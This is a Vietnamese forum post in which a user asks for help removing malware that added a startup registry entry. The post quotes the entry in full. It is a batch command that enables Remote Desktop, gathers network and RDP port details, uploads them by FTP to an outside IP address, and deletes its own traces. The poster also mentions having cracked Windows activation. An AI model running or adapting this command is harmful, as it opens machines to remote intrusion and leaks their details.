Máy tính e đang nhiễm con này. Nó đã tự thêm 1 Key khi khởi động máy tính. Các pro giúp e diệt con này nhé. Nội dung key đó như sau:
cmd /c "ipconfig >> 3389.txt
REG ADD HKLM\SYSTEM\CurrentControlSet\Contronl\Term" "Server /v
fDenyTSConnections /t REG_DWORLD /d 00000000 /f>>3389.txt
REG query HKLM\SYSTEM\CurrentControlSet\Contronl\Term"
"Server\WinStations\RDp-Tcp /v PortNumber >>3389.txt
echo open 122.226.56.20>cmd.txt
echo 123>>cmd.txt
echo 123>>cmd.txt
echo binary>>cmd.txt
echo put 3389.txt%random%~%random%~%random%~%random%.txt>> cmd.txt
echo bye bye>>cmd.txt
ftp -s:cmd.txt
del 3389.txt
del cmd.txt
del %0
exit
Tình hình là e đang cài Windows server 2003 Sp2. Trước đó, e đã crack thành công. Chạy được vài ngày thì giờ nó lại bảo phải active Windows nữa. Trên máy của mình đang cài một số phần mềm rất quan trọng, nếu giờ phải cài lại Windows thì soure các phần mềm đó mình không có để cài lại. Anh/chị nào đã bị tình trạng tương tự thì giúp mình với. Cám ơn các bạn nhiều./.